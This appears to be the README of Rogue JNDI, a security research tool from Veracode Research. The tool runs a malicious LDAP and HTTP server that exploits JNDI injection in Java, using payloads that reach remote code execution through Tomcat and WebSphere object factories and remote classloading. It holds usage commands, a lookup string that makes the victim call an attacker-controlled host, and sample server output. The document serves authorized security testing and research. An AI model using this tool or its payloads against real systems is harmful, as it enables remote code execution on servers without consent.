veracode-research/rogue-jndi

Rogue JNDI

A malicious LDAP server for JNDI injection attacks.

Description

The project contains LDAP & HTTP servers for exploiting insecure-by-default Java JNDI API.
In order to perform an attack, you can start these servers locally and then trigger a JNDI resolution on the vulnerable client, e.g.:

InitialContext.lookup("ldap://your_server.com:1389/o=reference");

It will initiate a connection from the vulnerable client to the local LDAP server. Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution.

Motivation

In addition to the known JNDI attack methods(via remote classloading in references), this tool brings new attack vectors by leveraging the power of ObjectFactories.

Supported payloads

RemoteReference.java - classic JNDI attack, leads to RCE via remote classloading, works up to jdk8u191
Tomcat.java - leads to RCE via unsafe reflection in org.apache.naming.factory.BeanFactory
WebSphere1.java - leads to OOB XXE in com.ibm.ws.webservices.engine.client.ServiceFactory
WebSphere2.java - leads to RCE via classpath manipulation in com.ibm.ws.client.applicationclient.ClientJ2CCFFactory

Usage

$ java -jar target/RogueJndi-1.0.jar -h
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Usage: java -jar target/RogueJndi-1.0.jar [options]
  Options:
    -c, --command  Command to execute on the target server (default: 
                   /Applications/Calculator.app/Contents/MacOS/Calculator) 
    -n, --hostname Local HTTP server hostname (required for remote 
                   classloading and websphere payloads) (default: 
                   192.168.1.10) 
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8000)
    --wsdl         [websphere1 payload option] WSDL file with XXE payload 
                   (default: /list.wsdl)
    --localjar     [websphere2 payload option] Local jar file to load (this 
                   file should be located on the remote server) (default: 
                   ../../../../../tmp/jar_cache7808167489549525095.tmp) 
    -h, --help     Show this help

The most important parameters are the ldap server hostname (-n, should be accessible from the target) and the command you want to execute on the target server (-c).

As an alternative to the "-c" option, you can modify the ExportObject.java file by putting java code you want to execute on the target server.

Example:

$ java -jar target/RogueJndi-1.0.jar --command "nslookup your_dns_sever.com" --hostname "192.168.1.10"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2

Building

Java v1.7+ and Maven v3+ required

mvn package

Disclamer

This software is provided solely for educational purposes and/or for testing systems which the user has prior permission to attack.

Special Thanks

Alvaro Muñoz and Oleksandr Mirosh for the excellent whitepaper on JNDI attacks
@zerothoughts for the inspirational spring-jndi repository
Moritz Bechler for the eminent marshallsec research

Authors

Michael Stepankin, Veracode Research